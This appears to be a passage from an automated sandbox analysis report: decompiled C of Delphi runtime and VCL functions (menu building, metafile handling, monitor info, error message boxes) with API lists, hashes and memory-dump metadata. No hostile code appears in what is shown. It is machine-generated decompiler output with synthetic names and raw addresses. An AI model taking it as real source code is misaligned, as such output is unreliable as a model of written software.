                                                                        C-Code - Quality: 87%
                                                                        			E00446428(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				char _v12;
                                                                        				char _v13;
                                                                        				struct tagMENUITEMINFOA _v61;
                                                                        				char _v68;
                                                                        				intOrPtr _t103;
                                                                        				CHAR* _t109;
                                                                        				char _t115;
                                                                        				short _t149;
                                                                        				void* _t154;
                                                                        				intOrPtr _t161;
                                                                        				intOrPtr _t184;
                                                                        				struct HMENU__* _t186;
                                                                        				int _t190;
                                                                        				void* _t192;
                                                                        				intOrPtr _t193;
                                                                        				void* _t196;
                                                                        				void* _t205;
                                                                        
                                                                        				_t155 = __ecx;
                                                                        				_v68 = 0;
                                                                        				_v12 = 0;
                                                                        				_v5 = __ecx;
                                                                        				_t186 = __edx;
                                                                        				_t154 = __eax;
                                                                        				_push(_t196);
                                                                        				_push(0x446683);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                        				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                        					L22:
                                                                        					_pop(_t161);
                                                                        					 *[fs:eax] = _t161;
                                                                        					_push(0x44668a);
                                                                        					E00404348( &_v68);
                                                                        					return E00404348( &_v12);
                                                                        				}
                                                                        				E004043E0( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                        				if(E00448264(_t154) <= 0) {
                                                                        					__eflags =  *((short*)(_t154 + 0x60));
                                                                        					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                        						L8:
                                                                        						if((GetVersion() & 0x000000ff) < 4) {
                                                                        							_t190 =  *(0x47aa7c + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0047AA70 |  *0x0047AA60 |  *0x0047AA68 | 0x00000400;
                                                                        							_t103 = E00448264(_t154);
                                                                        							__eflags = _t103;
                                                                        							if(_t103 <= 0) {
                                                                        								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047F8(_v12));
                                                                        							} else {
                                                                        								_t109 = E004047F8( *((intOrPtr*)(_t154 + 0x30)));
                                                                        								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044692C(_t154), _t109);
                                                                        							}
                                                                        							goto L22;
                                                                        						}
                                                                        						_v61.cbSize = 0x2c;
                                                                        						_v61.fMask = 0x3f;
                                                                        						_t192 = E00448820(_t154);
                                                                        						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00447E3C(_t154) == 0) {
                                                                        							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                        								L14:
                                                                        								_t115 = 0;
                                                                        								goto L16;
                                                                        							}
                                                                        							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                        							if(_t205 == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							goto L14;
                                                                        						} else {
                                                                        							L15:
                                                                        							_t115 = 1;
                                                                        							L16:
                                                                        							_v13 = _t115;
                                                                        							_v61.fType =  *(0x47aab0 + ((E00404744( *((intOrPtr*)(_t154 + 0x30)), 0x4466a8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0047AAA8 |  *0x0047AA84 |  *0x0047AAB8 |  *0x0047AAC0;
                                                                        							_v61.fState =  *0x0047AA90 |  *0x0047AAA0 |  *0x0047AA98;
                                                                        							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                        							_v61.hSubMenu = 0;
                                                                        							_v61.hbmpChecked = 0;
                                                                        							_v61.hbmpUnchecked = 0;
                                                                        							_v61.dwTypeData = E004047F8(_v12);
                                                                        							if(E00448264(_t154) > 0) {
                                                                        								_v61.hSubMenu = E0044692C(_t154);
                                                                        							}
                                                                        							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                        							goto L22;
                                                                        						}
                                                                        					}
                                                                        					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                        					__eflags = _t193;
                                                                        					if(_t193 == 0) {
                                                                        						L7:
                                                                        						_push(_v12);
                                                                        						_push(0x44669c);
                                                                        						E00445A8C( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                        						_push(_v68);
                                                                        						E004046C0();
                                                                        						goto L8;
                                                                        					}
                                                                        					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                        					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                        						goto L7;
                                                                        					}
                                                                        					_t184 =  *0x44531c; // 0x445368
                                                                        					_t149 = E00403768( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                        					__eflags = _t149;
                                                                        					if(_t149 != 0) {
                                                                        						goto L8;
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        				_v61.hSubMenu = E0044692C(_t154);
                                                                        				goto L8;
                                                                        			}






















                                                                        APIs
                                                                        • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 004465D4
                                                                        • GetVersion.KERNEL32(00000000,00446683), ref: 004464C4
                                                                          • Part of subcall function 0044692C: CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$CreateInsertItemPopupVersion
                                                                        • String ID: ,$?$hSD
                                                                        • API String ID: 133695497-2744044814
                                                                        • Opcode ID: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction ID: c1f226bee94c505ff5879a5e45d3f70f72b48b4718122b33157cbbefa9e75370
                                                                        • Opcode Fuzzy Hash: c33b320a3809bf8af9b9c0040c7416c45296dc4a54403c922eabdd25c516cfcc
                                                                        • Instruction Fuzzy Hash: BD611370A002409BEB10EF79DC816AE7BF5BF4A308F06457AE944E7396D738D845CB5A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetActiveWindow.USER32 ref: 00456733
                                                                        • GetWindowRect.USER32 ref: 0045678D
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 004567C5
                                                                        • MessageBoxA.USER32 ref: 00456806
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045687C,?,00000000,00456875), ref: 00456856
                                                                        • SetActiveWindow.USER32(?,0045687C,?,00000000,00456875), ref: 00456867
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Active$MessageRect
                                                                        • String ID: (
                                                                        • API String ID: 3147912190-3887548279
                                                                        • Opcode ID: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction ID: 7cbad7be9c4b48523c1cfc1a11d04e08d9ad09d2673b50e57f39b10a150b3f7a
                                                                        • Opcode Fuzzy Hash: 3547273055f9fab4712ace14ffcd2524f14b860b50c39c87bf408079b6818cc4
                                                                        • Instruction Fuzzy Hash: BE415EB5E00104AFDB04DFA9CD81FAE77F9EB48304F55446AF900EB392DA74AD008B54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00422CEA(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				int _v12;
                                                                        				BYTE* _v16;
                                                                        				intOrPtr _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				short _v30;
                                                                        				short _v32;
                                                                        				char _v38;
                                                                        				struct tagMETAFILEPICT _v54;
                                                                        				intOrPtr _v118;
                                                                        				intOrPtr _v122;
                                                                        				struct tagENHMETAHEADER _v154;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t115;
                                                                        				struct HENHMETAFILE__* _t119;
                                                                        				struct HENHMETAFILE__* _t120;
                                                                        				void* _t122;
                                                                        				void* _t123;
                                                                        				void* _t124;
                                                                        				void* _t125;
                                                                        				intOrPtr _t126;
                                                                        
                                                                        				_t124 = _t125;
                                                                        				_t126 = _t125 + 0xffffff68;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t122 = __eax;
                                                                        				E00422B88(__eax);
                                                                        				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                        				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				_v12 = _v12 - 0x16;
                                                                        				_v16 = E00402754(_v12);
                                                                        				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                        				 *[fs:eax] = _t126;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
                                                                        				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					_v24 = 0x60;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = 0;
                                                                        				_v54.yExt = 0;
                                                                        				_v54.hMF = 0;
                                                                        				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t119;
                                                                        				if(_t119 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = _v122;
                                                                        				_v54.yExt = _v118;
                                                                        				_v54.hMF = 0;
                                                                        				DeleteEnhMetaFile( *(_t103 + 8));
                                                                        				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t120;
                                                                        				if(_t120 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				 *((char*)(_t122 + 0x2c)) = 0;
                                                                        				_pop(_t115);
                                                                        				 *[fs:eax] = _t115;
                                                                        				_push(E00422E62);
                                                                        				return E00402774(_v16);
                                                                        			}

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction ID: fb0f5a08ef807ff7da08fe929f8a7a8f4baacde4112ddcaebb4220c4adbca4e0
                                                                        • Opcode Fuzzy Hash: 3a1adc593a487124711b27ce84d4190b2dfc95728f08b01ed21f342c1ee5f22a
                                                                        • Instruction Fuzzy Hash: CC412F75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00422CEC(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				int _v12;
                                                                        				BYTE* _v16;
                                                                        				intOrPtr _v18;
                                                                        				signed int _v24;
                                                                        				short _v26;
                                                                        				short _v28;
                                                                        				short _v30;
                                                                        				short _v32;
                                                                        				char _v38;
                                                                        				struct tagMETAFILEPICT _v54;
                                                                        				intOrPtr _v118;
                                                                        				intOrPtr _v122;
                                                                        				struct tagENHMETAHEADER _v154;
                                                                        				intOrPtr _t103;
                                                                        				intOrPtr _t115;
                                                                        				struct HENHMETAFILE__* _t119;
                                                                        				struct HENHMETAFILE__* _t120;
                                                                        				void* _t122;
                                                                        				void* _t123;
                                                                        				void* _t124;
                                                                        				void* _t125;
                                                                        				intOrPtr _t126;
                                                                        
                                                                        				_t124 = _t125;
                                                                        				_t126 = _t125 + 0xffffff68;
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __edx;
                                                                        				_t122 = __eax;
                                                                        				E00422B88(__eax);
                                                                        				 *((intOrPtr*)( *_v8 + 8))(__edi, __esi, __ebx, _t123);
                                                                        				if(_v38 != 0x9ac6cdd7 || E00421870( &_v38) != _v18) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				_v12 = _v12 - 0x16;
                                                                        				_v16 = E00402754(_v12);
                                                                        				_t103 =  *((intOrPtr*)(_t122 + 0x28));
                                                                        				 *[fs:eax] = _t126;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:eax], 0x422e5b, _t124);
                                                                        				 *((short*)( *((intOrPtr*)(_t122 + 0x28)) + 0x18)) = _v24;
                                                                        				if(_v24 == 0) {
                                                                        					_v24 = 0x60;
                                                                        				}
                                                                        				 *((intOrPtr*)(_t103 + 0xc)) = MulDiv(_v28 - _v32, 0x9ec, _v24 & 0x0000ffff);
                                                                        				 *((intOrPtr*)(_t103 + 0x10)) = MulDiv(_v26 - _v30, 0x9ec, _v24 & 0x0000ffff);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = 0;
                                                                        				_v54.yExt = 0;
                                                                        				_v54.hMF = 0;
                                                                        				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t119;
                                                                        				if(_t119 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
                                                                        				_v54.mm = 8;
                                                                        				_v54.xExt = _v122;
                                                                        				_v54.yExt = _v118;
                                                                        				_v54.hMF = 0;
                                                                        				DeleteEnhMetaFile( *(_t103 + 8));
                                                                        				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
                                                                        				 *(_t103 + 8) = _t120;
                                                                        				if(_t120 == 0) {
                                                                        					E00420A20();
                                                                        				}
                                                                        				 *((char*)(_t122 + 0x2c)) = 0;
                                                                        				_pop(_t115);
                                                                        				 *[fs:eax] = _t115;
                                                                        				_push(E00422E62);
                                                                        				return E00402774(_v16);
                                                                        			}

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction ID: 01aed2916d9461752607c608983ec61ef17ba308f3f8825e499b2a2baebaa4d3
                                                                        • Opcode Fuzzy Hash: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction Fuzzy Hash: DF412E75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E00427548(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				struct HMONITOR__* _t27;
                                                                        				struct tagMONITORINFO* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496ac8 != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						_t29->rcMonitor.left = 0;
                                                                        						_t29->rcMonitor.top = 0;
                                                                        						_t29->rcMonitor.right = GetSystemMetrics(0);
                                                                        						_t29->rcMonitor.bottom = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					 *0x496aac = E00427218(4, _t23,  *0x496aac, _t27, _t29);
                                                                        					_t24 = GetMonitorInfoA(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}

                                                                        APIs
                                                                        • GetMonitorInfoA.USER32(?,?), ref: 00427579
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275A0
                                                                        • GetSystemMetrics.USER32 ref: 004275B5
                                                                        • GetSystemMetrics.USER32 ref: 004275C0
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004275EA
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfo
                                                                        • API String ID: 1539801207-1633989206
                                                                        • Opcode ID: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction ID: 6783ea58f697a8443343b13a6c264d2348319dbac4baab090155d0615a0f433e
                                                                        • Opcode Fuzzy Hash: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction Fuzzy Hash: 0A1106727047116FD720CF65AC447A7F7A9EB17320F50853BFC06A7A40D7B9A8408BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040A0C8(void* __edi) {
                                                                        				void _v1024;
                                                                        				char _v1088;
                                                                        				long _v1092;
                                                                        				void* _t10;
                                                                        				char* _t12;
                                                                        				intOrPtr _t14;
                                                                        				intOrPtr _t16;
                                                                        				intOrPtr _t22;
                                                                        				long _t26;
                                                                        				void* _t34;
                                                                        
                                                                        				E00409F40(_t10,  &_v1024, _t34, 0x400);
                                                                        				_t12 =  *0x495b34; // 0x496048
                                                                        				if( *_t12 == 0) {
                                                                        					_t14 =  *0x495914; // 0x40759c
                                                                        					_t7 = _t14 + 4; // 0xffe8
                                                                        					_t16 =  *0x496714; // 0x400000
                                                                        					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
                                                                        					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
                                                                        				}
                                                                        				_t22 =  *0x49595c; // 0x496218
                                                                        				E00402D34(_t22);
                                                                        				_t26 = E00408BF8( &_v1024, __edi);
                                                                        				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
                                                                        				return WriteFile(GetStdHandle(0xfffffff5), 0x40a178, 2,  &_v1092, 0);
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00409F40: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                          • Part of subcall function 00409F40: LoadStringA.USER32 ref: 0040A032
                                                                        • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A108
                                                                        • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A10E
                                                                        • GetStdHandle.KERNEL32(000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A123
                                                                        • WriteFile.KERNEL32(00000000,000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A129
                                                                        • LoadStringA.USER32 ref: 0040A14B
                                                                        • MessageBoxA.USER32 ref: 0040A161
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                        • String ID: H`I
                                                                        • API String ID: 1802973324-3946158073
                                                                        • Opcode ID: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction ID: 164a82ec87427e02c43d68d6289cc30817225284fd7a8bc5127b03f5bcef9bb4
                                                                        • Opcode Fuzzy Hash: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction Fuzzy Hash: 46016DB1614300AAE200F7A4CC46F9B77EC9B45718F50463BB755FA0E2DA78E9148B3B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E004041CC(void* __ecx) {
                                                                        				long _v4;
                                                                        				int _t3;
                                                                        
                                                                        				if( *0x496048 == 0) {
                                                                        					if( *0x47a01c == 0) {
                                                                        						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
                                                                        					}
                                                                        					return _t3;
                                                                        				} else {
                                                                        					if( *0x49621c == 0xd7b2 &&  *0x496224 > 0) {
                                                                        						 *0x496234();
                                                                        					}
                                                                        					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
                                                                        					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2,  &_v4, 0);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
                                                                        • GetStdHandle.KERNEL32(000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404220
                                                                        • WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404226
                                                                        • MessageBoxA.USER32 ref: 00404244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction ID: 196c44c3e04e492743d3cd85247e7e05a160b8e68fe7c0a1ee4f43ec710e7497
                                                                        • Opcode Fuzzy Hash: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction Fuzzy Hash: FEF0BBA078438075FA2077649D07F9E224C47D1F19F604AFFB314B40E286BC44C4572E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 73%
                                                                        			E0042EE4C(void* __eax, void* __ecx, void* __edx) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v24;
                                                                        				struct HDWP__* _v28;
                                                                        				int _v32;
                                                                        				char _v36;
                                                                        				struct tagTEXTMETRICA _v92;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t85;
                                                                        				void* _t89;
                                                                        				void* _t113;
                                                                        				char _t117;
                                                                        				intOrPtr* _t119;
                                                                        				void* _t144;
                                                                        				void* _t146;
                                                                        				signed int _t147;
                                                                        				long _t148;
                                                                        				signed int _t158;
                                                                        				intOrPtr _t160;
                                                                        				struct HDC__* _t175;
                                                                        				int _t176;
